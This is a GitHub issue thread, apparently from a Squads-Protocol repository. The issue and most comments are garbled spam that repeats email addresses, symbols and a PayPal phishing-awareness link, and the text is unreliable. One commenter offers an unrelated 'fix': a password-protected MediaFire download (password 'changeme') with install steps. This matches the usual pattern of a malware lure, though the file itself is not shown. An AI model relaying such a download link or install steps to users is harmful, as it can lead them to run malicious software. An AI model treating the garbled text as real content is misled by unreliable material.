### ISSUE TITLE
example@example.comAcme.comHow to Detect Phishing Scams | PayPal US

### ISSUE THREAD

**Issue by Azile89** [Squads-Protocol/squads-mpl#58]
> > > "www.paypal.com"elizamrse@gmail- - .com[]()[]()[]() # elizamrse@gmail.com__„„“”~~elizamrse@Azile89. Godpurposeeliza&https://www.paypal.com/us/security/learn-about-fake-messages#:~:text=app%30or%type-,www.paypal.com,-into%30a%50new

**Comment by Azile89** [comment]
> > > > "www.paypal.com"elizamrse@gmail- - .com[]()[]()[]() # elizamrse@gmail.com__„„“”~~elizamrse@Azile89. Godpurposeeliza&https://www.paypal.com/us/security/learn-about-fake-messages#:~:text=app%30or%type-,www.paypal.com,-into%30a%50new

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Azile89** [comment]
- add+_„*can.umprimmentivize[x] > > > - - - - > > > > > "www.paypal.com"elizamrse@gmail- - .com[]()[]()[]() # elizamrse@gmail.com__„„“”~~elizamrse@Azile89. Godpurposeeliza&https://www.paypal.com/us/security/learn-about-fake-messages#:~:text=app%30or%type-,www.paypal.com,-into%30a%50new
> 
> 
[]()[~~umprimmentivize[x] >~~
